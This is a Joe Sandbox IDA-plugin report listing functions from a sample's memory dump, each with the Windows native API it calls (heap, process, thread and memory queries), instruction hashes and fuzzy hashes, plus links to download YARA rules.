Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FactoryInformationWorker
String ID:
API String ID: 270927234-0
Opcode ID: c3fc787f203792722e083f8367bd7148f141fe1dbdfef0abc227795a07417bee
Instruction ID: b4fa62ee205d82ed13abd6a29cba69e910c823548718d045267d4c85a04def35
Opcode Fuzzy Hash: c3fc787f203792722e083f8367bd7148f141fe1dbdfef0abc227795a07417bee
Instruction Fuzzy Hash: 98F0B47260010EFBDB04DAA5C946FFE77B8DB00704F6042AAA611DB0D1EA709A058784

Uniqueness

Uniqueness Score: -1.00%

Function 726D13B6, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwCreateEvent.210A(?,001F0003,?,00000000,00000000,00000065), ref: 726D13F7

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CreateEvent
String ID:
API String ID: 2692171526-0
Opcode ID: 8a3ab647857f853a57d4772c6c5addcfe252d48f8b1df3af4dfc5aeced6f5be2
Instruction ID: 4f2136f7b5f8e8771ae370c637fcdb11b83e8e7ea186e1598c1907bf259ec621
Opcode Fuzzy Hash: 8a3ab647857f853a57d4772c6c5addcfe252d48f8b1df3af4dfc5aeced6f5be2
Instruction Fuzzy Hash: BBF030B1D0020D6FDB10CEADD4017AEBBF9AB44200F11406AA508E7240E67146518791

Uniqueness

Uniqueness Score: -1.00%

Function 726F66A2, Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

ZwSetInformationVirtualMemory.210A(000000FF,00000002,00000001,?,?,00000010), ref: 726F66EC

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationMemoryVirtual
String ID:
API String ID: 787413757-0
Opcode ID: 5f44eff5f6ff80f9a5cd16671a3252a24b1e9fe0119b4670c0ef35b43bc2ac3c
Instruction ID: 521cb584216ee1541ffc0a175f025e07da3887aad20c81c28cd053941c381151
Opcode Fuzzy Hash: 5f44eff5f6ff80f9a5cd16671a3252a24b1e9fe0119b4670c0ef35b43bc2ac3c
Instruction Fuzzy Hash: D6F01D72C4020DABDB04CF95C846BEEBBF8EB04310F10426AE520A2280E7755A448B95

Uniqueness

Uniqueness Score: -1.00%

Function 7264B4D0, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.210A(?,?), ref: 7264B513

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ea814415e483c9d484af8a87b54c9f3960d1a7fcee4b10038af7301ea062a191
Instruction ID: 617ec5b820331b1feb7e2619f3c3aaf1da040e27b8a4d0b77645ab1b13716c03
Opcode Fuzzy Hash: ea814415e483c9d484af8a87b54c9f3960d1a7fcee4b10038af7301ea062a191
Instruction Fuzzy Hash: 9BF0BE319105868FC71B8F5CCA41F11BB76AB81330F18426AE4564B5E1DE30DA01C7C4

Uniqueness

Uniqueness Score: -1.00%

Function 726F3660, Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

ZwQueryVirtualMemory.210A(000000FF,?,00000003,00000000,00000014,?,00000000,00008000,?), ref: 726F368D

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 4e67bc3a1ed5a1f1f3e5b478eaad9bc867d09f5fd3f7a0a140bb6adae6c3a8a4
Instruction ID: 6c809651d88bf9fd44dcdfa65c73b9c43d654eb0275cfeb341beb194f89180ba
Opcode Fuzzy Hash: 4e67bc3a1ed5a1f1f3e5b478eaad9bc867d09f5fd3f7a0a140bb6adae6c3a8a4
Instruction Fuzzy Hash: 96F0EC315001C8B7DF11D95DC905F9A7B79EB80714FB0C356AD11072D5D630DE61C761

Uniqueness

Uniqueness Score: -1.00%

Function 727150CC, Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

ZwTraceControl.210A(00000027,?,00000002,?,00000008,?,00000000,?,?,?,?), ref: 727150ED

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ControlTrace
String ID:
API String ID: 1197477875-0
Opcode ID: eec59bc885492082caaa6cec7345ade797ad510c91fc8cbb3d461e0a4b1ec6f0
Instruction ID: 155734a79448f28273e529e75995f04a1fba4627963efc0f5ca8071639b6d365
Opcode Fuzzy Hash: eec59bc885492082caaa6cec7345ade797ad510c91fc8cbb3d461e0a4b1ec6f0
Instruction Fuzzy Hash: B2F0397590420DBAE700EE98D801EFAB7BCEF84310F1084A6ED54A7380F670AA41C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 7264E668, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,?,00000002,00000055,00000000,?,?,726FD0D4,00000000,00000000,?,?,00000000,00000000,?), ref: 7264E697

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9ee7a879fde0cec5025c96e60f0ed258da409bc27efe7a347af7453c25965c25
Instruction ID: 0786809c361085ac34093e4d273cbc7f2bb8965df9be4f545c05882e7b679d80
Opcode Fuzzy Hash: 9ee7a879fde0cec5025c96e60f0ed258da409bc27efe7a347af7453c25965c25
Instruction Fuzzy Hash: 47E09236A40154BBCB21869D9E05FAB7EBCDB44A50F100056F90597191D9309E00C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 726500FE, Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON

Download Yara Rule

APIs

RtlUnlockHeap.210A(?,?,7264FD0A,00000000,?,?,727379A0), ref: 72650143

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: HeapUnlock
String ID:
API String ID: 1420857277-0
Opcode ID: 99672ce396becc9be2ec5a88e41e555a06f01c59dbb40114268e5dd7ebd20a01
Instruction ID: 4d02fa19b13537d4d8cbeb8777b77cf3ca7ea9212a1b673100086753af50ce7a
Opcode Fuzzy Hash: 99672ce396becc9be2ec5a88e41e555a06f01c59dbb40114268e5dd7ebd20a01
Instruction Fuzzy Hash: 45F0B831000A108FD326CF18D200B9573A8EB48328F10C14DE01E8B291C736D882CB80

Uniqueness

Uniqueness Score: -1.00%

Function 726D1689, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwQueryInformationProcess.210A(000000FF,00000007,?,00000004,00000000,?,?,?,726D1391,00000065,00000000,?,726D069E,?,00000000), ref: 726D16A0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 4dc7eeddcd64adca22a58ff6b99763f65a4948caeeb095d7ffde51e9c73a0bc8
Instruction ID: 2e483367a44fed90a6fe1af2e7227afd03e151fd90e8152bd922ea3fdc40a1c5
Opcode Fuzzy Hash: 4dc7eeddcd64adca22a58ff6b99763f65a4948caeeb095d7ffde51e9c73a0bc8
Instruction Fuzzy Hash: B5E0ECB1A0527CBBDB209AA99D01FAEBA6DDB41A64F200297BE15D21C0D5B09E0086D5

Uniqueness

Uniqueness Score: -1.00%

Function 7264B2E0, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

ZwSetInformationWorkerFactory.210A(?,0000000B,000000F1,00000004), ref: 7264B308

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FactoryInformationWorker
String ID:
API String ID: 270927234-0
Opcode ID: 1fd5fb2de30db85876eae835fec9e061d86f7db5132f2135b79a95a5b17d71a9
Instruction ID: ad71bece24df6441983d78e3d9b44f3183add8d81e77ba5341f5dbe6e5d943be
Opcode Fuzzy Hash: 1fd5fb2de30db85876eae835fec9e061d86f7db5132f2135b79a95a5b17d71a9
Instruction Fuzzy Hash: 31E06D30500208EBDB218E8EC815B993B64AB01738F00C207F9794E1E4CB74DA54EF15

Uniqueness

Uniqueness Score: -1.00%

Function 726D174B, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwSetInformationProcess.210A(?,0000003F,?,00000008,?,?,?,726D0A73,?,727201C0,00000058,726D06D1,?,00000000,?,00000000), ref: 726D1778

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationProcess
String ID:
API String ID: 1801817001-0
Opcode ID: 8855bb95107d9e415cfa53c6c9b9e66a58325d46b9d8d75a3b030bdca8684224
Instruction ID: c3b8980b4aefe7f405e96fd25d228b91280c10eef1983cbf3434026e99d09438
Opcode Fuzzy Hash: 8855bb95107d9e415cfa53c6c9b9e66a58325d46b9d8d75a3b030bdca8684224
Instruction Fuzzy Hash: 31E04FB191420DBBDB09CFA8C801FAEBAA8D705300F1081ABB504E7180E9B18A408794

Uniqueness

Uniqueness Score: -1.00%

Function 726D9574, Relevance: 1.5, APIs: 1, Instructions: 23filenativeCOMMON

Download Yara Rule

APIs

ZwSetInformationFile.210A(?,00540052,?,00000008,0000000E), ref: 726D9599

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FileInformation
String ID:
API String ID: 4253254148-0
Opcode ID: 69985975e3e6d67e100b7a0632353266007a229f7cf55a0312c7311dc6a585a3
Instruction ID: b6e0487f806b52922c39f9a5c05e62dcac7d220379f6383b39992191a5ff568e
Opcode Fuzzy Hash: 69985975e3e6d67e100b7a0632353266007a229f7cf55a0312c7311dc6a585a3
Instruction Fuzzy Hash: E2E026B082220C6AFF1485A8C800FBE7A3CEB81324F40036BED16621C0FA31EA048365

Uniqueness

Uniqueness Score: -1.00%

Function 726D5170, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

ZwWow64DebuggerCall.210A(00000002,?,?,?,726E4B5F,726B036B,?,726E4B5F,Break repeatedly, break Once, Ignore, terminate Process, or terminate Thread (boipt)? ,?,00000002,?,?,?,?,00000000), ref: 726D5196

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CallDebuggerWow64
String ID:
API String ID: 1238156548-0
Opcode ID: 4f1f7c8a4801f23d95ca9a98ae6056beb1559954d8b0e9b826eeb4ebff75ed6b
Instruction ID: 223f1e98173b58ddca5b8f32d07ec2d5f6d7b2167bdd73b442fc9638b0345a78
Opcode Fuzzy Hash: 4f1f7c8a4801f23d95ca9a98ae6056beb1559954d8b0e9b826eeb4ebff75ed6b
Instruction Fuzzy Hash: 85E0C23200426CBACF015E99DC04EFA7F6EDFC5721B00810AFD894B585C532A912D7B4

Uniqueness

Uniqueness Score: -1.00%

Function 726866D0, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

ZwSetInformationWorkerFactory.210A(?,0000000E,00000000,00000004,?,72717AF0,00000000,00000000,00000000,00000000,727386C4,727386C4,00000008,?,00000000,00000008), ref: 726866FC

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FactoryInformationWorker
String ID:
API String ID: 270927234-0
Opcode ID: 3d52e090e1971ac54bba3fc7a942a57cdb920f868e172dc721ecbf5f56b33158
Instruction ID: 4173caf447dff5a6fea84104ee0d4dd497c21a792ea157ab27a04e8270461cbb
Opcode Fuzzy Hash: 3d52e090e1971ac54bba3fc7a942a57cdb920f868e172dc721ecbf5f56b33158
Instruction Fuzzy Hash: 50E04F71110288ABF706DF48C644F153BB9AB44724F11801BF51A8B1E1EB76D994CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 726D16B6, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwQueryInformationProcess.210A(000000FF,00000025,?,00000030,00000000), ref: 726D16CA

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: fece604cb5df76edaded42dadfb6669ca68a2185cd261af38407dc40eacf354d
Instruction ID: 2ab9392d1d0939583d7128d014c0dd7c9de2c6c9dd5ccf199aacdd8f6f433c5c
Opcode Fuzzy Hash: fece604cb5df76edaded42dadfb6669ca68a2185cd261af38407dc40eacf354d
Instruction Fuzzy Hash: 9DD02E3A2242DC7BEB1464F84D0AFAA72AC93443A1F2807A2AE20E10C0F2D0950080A9

Uniqueness

Uniqueness Score: -1.00%

Function 72715567, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

ZwDelayExecution.210A(00000000,FFD9DA60,00000000,00000000,00000000,?,727145ED,?,?,00000048,00000048,00000000,00000000,00000000,00000000), ref: 72715589

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 443a66cb7dfe6ce6823286f0a4df3d8dc6b61a67b584f22f962c28d90c142e62
Instruction ID: 05dd1e24d026a44481223f94eb254a12af19f7e14f833887a6cf3ccfcac0fb0f
Opcode Fuzzy Hash: 443a66cb7dfe6ce6823286f0a4df3d8dc6b61a67b584f22f962c28d90c142e62
Instruction Fuzzy Hash: 6BE0C272519219BBC7288A9DC901E9BBBADDF44330F90038AA81993290EA609E5086A5

Uniqueness

Uniqueness Score: -1.00%

Function 726D1724, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwQueryInformationProcess.210A(?,00000000,?,00000018,00000000), ref: 726D1737

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 1702b006b0905b683fb29b9ec43ea260fb554aa0b24d6c9896726ba602d4c51e
Instruction ID: 879e0b76630bdb9a38d5c3cf6c8b7a25b7cdd9d43d7e2821e36bff30f49c717e
Opcode Fuzzy Hash: 1702b006b0905b683fb29b9ec43ea260fb554aa0b24d6c9896726ba602d4c51e
Instruction Fuzzy Hash: F2D0A77074030C77D72095784C02F96766C8748700F0005D1BE04D61C1F590E81181D4

Uniqueness

Uniqueness Score: -1.00%

Function 726D1783, Relevance: 1.5, APIs: 1, Instructions: 19nativethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwQueryInformationThread.210A(000000FE,00000000,?,0000001C,00000000), ref: 726D1796

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationQueryThread
String ID:
API String ID: 741662350-0
Opcode ID: 324b1ddb0741e8f7310f0d5a4e75e9d3751492da8a2734138f5a16b83d04679b
Instruction ID: 4a68059485203cea9dde66829bee1067b5afb9503b145c510ee9ab417c233b8a
Opcode Fuzzy Hash: 324b1ddb0741e8f7310f0d5a4e75e9d3751492da8a2734138f5a16b83d04679b
Instruction Fuzzy Hash: 49D0A9B4A8030DBBEB20AAB88D02FAB76AC9784700F000592BE08E61C2F5A0E81141A4

Uniqueness

Uniqueness Score: -1.00%

Function 726494E5, Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.210A(?,00000000,00000000,C000000D,726E6766,?,00000000,?,?,00000008,00000154,00000000,?,?), ref: 726494FA

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7bd64438c64adb4d903dae088250b6b88d4ba6a348c0d5ea73f5c926c5686e6e
Instruction ID: 9a772015328a8b037b3811d0df3190f074709448fcd99205f6235614020a1f7b
Opcode Fuzzy Hash: 7bd64438c64adb4d903dae088250b6b88d4ba6a348c0d5ea73f5c926c5686e6e
Instruction Fuzzy Hash: 9AD0223224707093CB1D0648E910F6379169B81A58F16006E740A8388888108F02C2E0

Uniqueness

Uniqueness Score: -1.00%

Function 726483E0, Relevance: 1.5, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 72671A3C: RtlReleaseActivationContext.210A(?,7271F970,000000A8,726483ED), ref: 72671A68
Part of subcall function 72671A3C: RtlAcquireSRWLockExclusive.210A(?,7271F970,000000A8,726483ED), ref: 72671A7C

RtlFreeHeap.210A(?,?,?), ref: 72648404

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AcquireActivationContextExclusiveFreeHeapLockRelease
String ID:
API String ID: 1741230222-0
Opcode ID: 9b7af911940e91b592dbd0d9757f8470ee1400e8ed1185b7d3877d4927a71b0f
Instruction ID: 4e012bcbe2e9fb0851156007de5e5a7cc8c86d44039ec69c02d2f7a9bca719b5
Opcode Fuzzy Hash: 9b7af911940e91b592dbd0d9757f8470ee1400e8ed1185b7d3877d4927a71b0f
Instruction Fuzzy Hash: 44D0A932050288ABC711EF0CDE40F163FAEEBA4710F000022B408876A3CA30ED61CA98

Uniqueness

Uniqueness Score: -1.00%

Function 7268713B, Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.210A(?,?,00000000,7266D140,7266CFF5,?,?), ref: 72687158

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 67b10358d42a2c5a374e2cff6bb939477c00b2c8b012cf138b270923ba86cc4c
Instruction ID: eddd348e048bb143d25ff0d7fa28491b5696d421843bff937fb89d0c163180bd
Opcode Fuzzy Hash: 67b10358d42a2c5a374e2cff6bb939477c00b2c8b012cf138b270923ba86cc4c
Instruction Fuzzy Hash: A2D05E72151480EFD716CB08CA56F3637B8F700B05F4540BCA04A8B966C739E901DB40

Uniqueness

Uniqueness Score: -1.00%

Function 72671041, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.210A(?,72670D8E,?,0000003A,727379A0,?,00000000,72692500,7271F918,000000FE,?,72670A01), ref: 72671061

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 99a012b1cdbc8f9470d1344c0058c6c350ce640b58cd0d56bff8fea3a828c814
Instruction ID: 1224b8754e7daf9658578cbe5d70ffbc755dd8f8f839eb9b63382536d1579ab6
Opcode Fuzzy Hash: 99a012b1cdbc8f9470d1344c0058c6c350ce640b58cd0d56bff8fea3a828c814
Instruction Fuzzy Hash: B7D0A9B14412C48EE702AB28E218F583BB2BB00208F9830E7C402266D28B3A89C6D704

Uniqueness

Uniqueness Score: -1.00%

Function 72718248, Relevance: 1.5, APIs: 1, Instructions: 11nativethreadCOMMON

Download Yara Rule

APIs

ZwAlertThreadByThreadId.210A(?,00000000,726B93FE,?), ref: 72718252

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
